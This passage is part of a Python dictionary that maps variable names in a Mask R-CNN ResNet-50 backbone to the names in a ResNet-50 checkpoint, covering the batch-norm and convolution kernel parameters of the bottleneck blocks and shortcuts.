'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_2/batch_normalization_3/moving_mean': 'resnet50/btlnck_block_0_0/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_2/batch_normalization_3/moving_variance': 'resnet50/btlnck_block_0_0/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_2/conv2d_3/kernel': 'resnet50/btlnck_block_0_0/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_3/batch_normalization_4/beta': 'resnet50/btlnck_block_0_0/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_3/batch_normalization_4/gamma': 'resnet50/btlnck_block_0_0/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_3/batch_normalization_4/moving_mean': 'resnet50/btlnck_block_0_0/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_3/batch_normalization_4/moving_variance': 'resnet50/btlnck_block_0_0/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_3/conv2d_4/kernel': 'resnet50/btlnck_block_0_0/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/shortcut/batch_normalization_1/beta': 'resnet50/btlnck_block_0_0/shortcut/conv2d/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/shortcut/batch_normalization_1/gamma': 'resnet50/btlnck_block_0_0/shortcut/conv2d/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/shortcut/batch_normalization_1/moving_mean': 'resnet50/btlnck_block_0_0/shortcut/conv2d/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/shortcut/batch_normalization_1/moving_variance': 'resnet50/btlnck_block_0_0/shortcut/conv2d/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/shortcut/conv2d_1/kernel': 'resnet50/btlnck_block_0_0/shortcut/conv2d/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_4/batch_normalization_5/beta': 'resnet50/btlnck_block_0_1/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_4/batch_normalization_5/gamma': 'resnet50/btlnck_block_0_1/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_4/batch_normalization_5/moving_mean': 'resnet50/btlnck_block_0_1/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_4/batch_normalization_5/moving_variance': 'resnet50/btlnck_block_0_1/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_4/conv2d_5/kernel': 'resnet50/btlnck_block_0_1/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_5/batch_normalization_6/beta': 'resnet50/btlnck_block_0_1/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_5/batch_normalization_6/gamma': 'resnet50/btlnck_block_0_1/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_5/batch_normalization_6/moving_mean': 'resnet50/btlnck_block_0_1/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_5/batch_normalization_6/moving_variance': 'resnet50/btlnck_block_0_1/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_5/conv2d_6/kernel': 'resnet50/btlnck_block_0_1/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_6/batch_normalization_7/beta': 'resnet50/btlnck_block_0_1/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_6/batch_normalization_7/gamma': 'resnet50/btlnck_block_0_1/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_6/batch_normalization_7/moving_mean': 'resnet50/btlnck_block_0_1/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_6/batch_normalization_7/moving_variance': 'resnet50/btlnck_block_0_1/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_6/conv2d_7/kernel': 'resnet50/btlnck_block_0_1/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_7/batch_normalization_8/beta': 'resnet50/btlnck_block_0_2/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_7/batch_normalization_8/gamma': 'resnet50/btlnck_block_0_2/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_7/batch_normalization_8/moving_mean': 'resnet50/btlnck_block_0_2/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_7/batch_normalization_8/moving_variance': 'resnet50/btlnck_block_0_2/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_7/conv2d_8/kernel': 'resnet50/btlnck_block_0_2/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_8/batch_normalization_9/beta': 'resnet50/btlnck_block_0_2/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_8/batch_normalization_9/gamma': 'resnet50/btlnck_block_0_2/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_8/batch_normalization_9/moving_mean': 'resnet50/btlnck_block_0_2/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_8/batch_normalization_9/moving_variance': 'resnet50/btlnck_block_0_2/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_8/conv2d_9/kernel': 'resnet50/btlnck_block_0_2/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_9/batch_normalization_10/beta': 'resnet50/btlnck_block_0_2/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_9/batch_normalization_10/gamma': 'resnet50/btlnck_block_0_2/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_9/batch_normalization_10/moving_mean': 'resnet50/btlnck_block_0_2/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_9/batch_normalization_10/moving_variance': 'resnet50/btlnck_block_0_2/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_2/conv2d_block_9/conv2d_10/kernel': 'resnet50/btlnck_block_0_2/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_10/batch_normalization_12/beta': 'resnet50/btlnck_block_1_0/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_10/batch_normalization_12/gamma': 'resnet50/btlnck_block_1_0/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_10/batch_normalization_12/moving_mean': 'resnet50/btlnck_block_1_0/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_10/batch_normalization_12/moving_variance': 'resnet50/btlnck_block_1_0/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_10/conv2d_12/kernel': 'resnet50/btlnck_block_1_0/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_11/batch_normalization_13/beta': 'resnet50/btlnck_block_1_0/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_11/batch_normalization_13/gamma': 'resnet50/btlnck_block_1_0/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_11/batch_normalization_13/moving_mean': 'resnet50/btlnck_block_1_0/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_11/batch_normalization_13/moving_variance': 'resnet50/btlnck_block_1_0/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_11/conv2d_13/kernel': 'resnet50/btlnck_block_1_0/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_12/batch_normalization_14/beta': 'resnet50/btlnck_block_1_0/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_12/batch_normalization_14/gamma': 'resnet50/btlnck_block_1_0/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_12/batch_normalization_14/moving_mean': 'resnet50/btlnck_block_1_0/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_12/batch_normalization_14/moving_variance': 'resnet50/btlnck_block_1_0/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/conv2d_block_12/conv2d_14/kernel': 'resnet50/btlnck_block_1_0/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/shortcut/batch_normalization_11/beta': 'resnet50/btlnck_block_1_0/shortcut/conv2d/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/shortcut/batch_normalization_11/gamma': 'resnet50/btlnck_block_1_0/shortcut/conv2d/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/shortcut/batch_normalization_11/moving_mean': 'resnet50/btlnck_block_1_0/shortcut/conv2d/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/shortcut/batch_normalization_11/moving_variance': 'resnet50/btlnck_block_1_0/shortcut/conv2d/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_3/shortcut/conv2d_11/kernel': 'resnet50/btlnck_block_1_0/shortcut/conv2d/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_13/batch_normalization_15/beta': 'resnet50/btlnck_block_1_1/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_13/batch_normalization_15/gamma': 'resnet50/btlnck_block_1_1/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_13/batch_normalization_15/moving_mean': 'resnet50/btlnck_block_1_1/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_13/batch_normalization_15/moving_variance': 'resnet50/btlnck_block_1_1/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_13/conv2d_15/kernel': 'resnet50/btlnck_block_1_1/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_14/batch_normalization_16/beta': 'resnet50/btlnck_block_1_1/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_14/batch_normalization_16/gamma': 'resnet50/btlnck_block_1_1/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_14/batch_normalization_16/moving_mean': 'resnet50/btlnck_block_1_1/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_14/batch_normalization_16/moving_variance': 'resnet50/btlnck_block_1_1/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_14/conv2d_16/kernel': 'resnet50/btlnck_block_1_1/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_15/batch_normalization_17/beta': 'resnet50/btlnck_block_1_1/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_15/batch_normalization_17/gamma': 'resnet50/btlnck_block_1_1/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_15/batch_normalization_17/moving_mean': 'resnet50/btlnck_block_1_1/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_15/batch_normalization_17/moving_variance': 'resnet50/btlnck_block_1_1/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_4/conv2d_block_15/conv2d_17/kernel': 'resnet50/btlnck_block_1_1/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_16/batch_normalization_18/beta': 'resnet50/btlnck_block_1_2/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_16/batch_normalization_18/gamma': 'resnet50/btlnck_block_1_2/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_16/batch_normalization_18/moving_mean': 'resnet50/btlnck_block_1_2/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_16/batch_normalization_18/moving_variance': 'resnet50/btlnck_block_1_2/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_16/conv2d_18/kernel': 'resnet50/btlnck_block_1_2/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_17/batch_normalization_19/beta': 'resnet50/btlnck_block_1_2/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_17/batch_normalization_19/gamma': 'resnet50/btlnck_block_1_2/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_17/batch_normalization_19/moving_mean': 'resnet50/btlnck_block_1_2/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_17/batch_normalization_19/moving_variance': 'resnet50/btlnck_block_1_2/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_17/conv2d_19/kernel': 'resnet50/btlnck_block_1_2/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_18/batch_normalization_20/beta': 'resnet50/btlnck_block_1_2/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_18/batch_normalization_20/gamma': 'resnet50/btlnck_block_1_2/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_18/batch_normalization_20/moving_mean': 'resnet50/btlnck_block_1_2/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_18/batch_normalization_20/moving_variance': 'resnet50/btlnck_block_1_2/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_5/conv2d_block_18/conv2d_20/kernel': 'resnet50/btlnck_block_1_2/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_19/batch_normalization_21/beta': 'resnet50/btlnck_block_1_3/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_19/batch_normalization_21/gamma': 'resnet50/btlnck_block_1_3/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_19/batch_normalization_21/moving_mean': 'resnet50/btlnck_block_1_3/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_19/batch_normalization_21/moving_variance': 'resnet50/btlnck_block_1_3/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_19/conv2d_21/kernel': 'resnet50/btlnck_block_1_3/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_20/batch_normalization_22/beta': 'resnet50/btlnck_block_1_3/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_20/batch_normalization_22/gamma': 'resnet50/btlnck_block_1_3/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_20/batch_normalization_22/moving_mean': 'resnet50/btlnck_block_1_3/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_20/batch_normalization_22/moving_variance': 'resnet50/btlnck_block_1_3/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_20/conv2d_22/kernel': 'resnet50/btlnck_block_1_3/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_21/batch_normalization_23/beta': 'resnet50/btlnck_block_1_3/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_21/batch_normalization_23/gamma': 'resnet50/btlnck_block_1_3/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_21/batch_normalization_23/moving_mean': 'resnet50/btlnck_block_1_3/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_21/batch_normalization_23/moving_variance': 'resnet50/btlnck_block_1_3/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_1/bottleneck_block_6/conv2d_block_21/conv2d_23/kernel': 'resnet50/btlnck_block_1_3/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_22/batch_normalization_25/beta': 'resnet50/btlnck_block_2_0/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_22/batch_normalization_25/gamma': 'resnet50/btlnck_block_2_0/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_22/batch_normalization_25/moving_mean': 'resnet50/btlnck_block_2_0/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_22/batch_normalization_25/moving_variance': 'resnet50/btlnck_block_2_0/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_22/conv2d_25/kernel': 'resnet50/btlnck_block_2_0/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_23/batch_normalization_26/beta': 'resnet50/btlnck_block_2_0/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_23/batch_normalization_26/gamma': 'resnet50/btlnck_block_2_0/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_23/batch_normalization_26/moving_mean': 'resnet50/btlnck_block_2_0/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_23/batch_normalization_26/moving_variance': 'resnet50/btlnck_block_2_0/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_23/conv2d_26/kernel': 'resnet50/btlnck_block_2_0/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_24/batch_normalization_27/beta': 'resnet50/btlnck_block_2_0/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_24/batch_normalization_27/gamma': 'resnet50/btlnck_block_2_0/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_24/batch_normalization_27/moving_mean': 'resnet50/btlnck_block_2_0/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_24/batch_normalization_27/moving_variance': 'resnet50/btlnck_block_2_0/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/conv2d_block_24/conv2d_27/kernel': 'resnet50/btlnck_block_2_0/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/shortcut/batch_normalization_24/beta': 'resnet50/btlnck_block_2_0/shortcut/conv2d/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/shortcut/batch_normalization_24/gamma': 'resnet50/btlnck_block_2_0/shortcut/conv2d/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/shortcut/batch_normalization_24/moving_mean': 'resnet50/btlnck_block_2_0/shortcut/conv2d/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/shortcut/batch_normalization_24/moving_variance': 'resnet50/btlnck_block_2_0/shortcut/conv2d/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_7/shortcut/conv2d_24/kernel': 'resnet50/btlnck_block_2_0/shortcut/conv2d/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_25/batch_normalization_28/beta': 'resnet50/btlnck_block_2_1/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_25/batch_normalization_28/gamma': 'resnet50/btlnck_block_2_1/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_25/batch_normalization_28/moving_mean': 'resnet50/btlnck_block_2_1/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_25/batch_normalization_28/moving_variance': 'resnet50/btlnck_block_2_1/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_25/conv2d_28/kernel': 'resnet50/btlnck_block_2_1/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_26/batch_normalization_29/beta': 'resnet50/btlnck_block_2_1/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_26/batch_normalization_29/gamma': 'resnet50/btlnck_block_2_1/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_26/batch_normalization_29/moving_mean': 'resnet50/btlnck_block_2_1/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_26/batch_normalization_29/moving_variance': 'resnet50/btlnck_block_2_1/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_26/conv2d_29/kernel': 'resnet50/btlnck_block_2_1/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_27/batch_normalization_30/beta': 'resnet50/btlnck_block_2_1/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_27/batch_normalization_30/gamma': 'resnet50/btlnck_block_2_1/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_27/batch_normalization_30/moving_mean': 'resnet50/btlnck_block_2_1/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_27/batch_normalization_30/moving_variance': 'resnet50/btlnck_block_2_1/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_8/conv2d_block_27/conv2d_30/kernel': 'resnet50/btlnck_block_2_1/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_28/batch_normalization_31/beta': 'resnet50/btlnck_block_2_2/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_28/batch_normalization_31/gamma': 'resnet50/btlnck_block_2_2/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_28/batch_normalization_31/moving_mean': 'resnet50/btlnck_block_2_2/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_28/batch_normalization_31/moving_variance': 'resnet50/btlnck_block_2_2/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_28/conv2d_31/kernel': 'resnet50/btlnck_block_2_2/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_29/batch_normalization_32/beta': 'resnet50/btlnck_block_2_2/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_29/batch_normalization_32/gamma': 'resnet50/btlnck_block_2_2/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_29/batch_normalization_32/moving_mean': 'resnet50/btlnck_block_2_2/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_29/batch_normalization_32/moving_variance': 'resnet50/btlnck_block_2_2/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_29/conv2d_32/kernel': 'resnet50/btlnck_block_2_2/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_30/batch_normalization_33/beta': 'resnet50/btlnck_block_2_2/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_30/batch_normalization_33/gamma': 'resnet50/btlnck_block_2_2/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_30/batch_normalization_33/moving_mean': 'resnet50/btlnck_block_2_2/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_30/batch_normalization_33/moving_variance': 'resnet50/btlnck_block_2_2/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_9/conv2d_block_30/conv2d_33/kernel': 'resnet50/btlnck_block_2_2/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_31/batch_normalization_34/beta': 'resnet50/btlnck_block_2_3/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_31/batch_normalization_34/gamma': 'resnet50/btlnck_block_2_3/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_31/batch_normalization_34/moving_mean': 'resnet50/btlnck_block_2_3/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_31/batch_normalization_34/moving_variance': 'resnet50/btlnck_block_2_3/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group_2/bottleneck_block_10/conv2d_block_31/conv2d_34/kernel': 'resnet50/btlnck_block_2_3/bottleneck_1/conv2d/kernel',
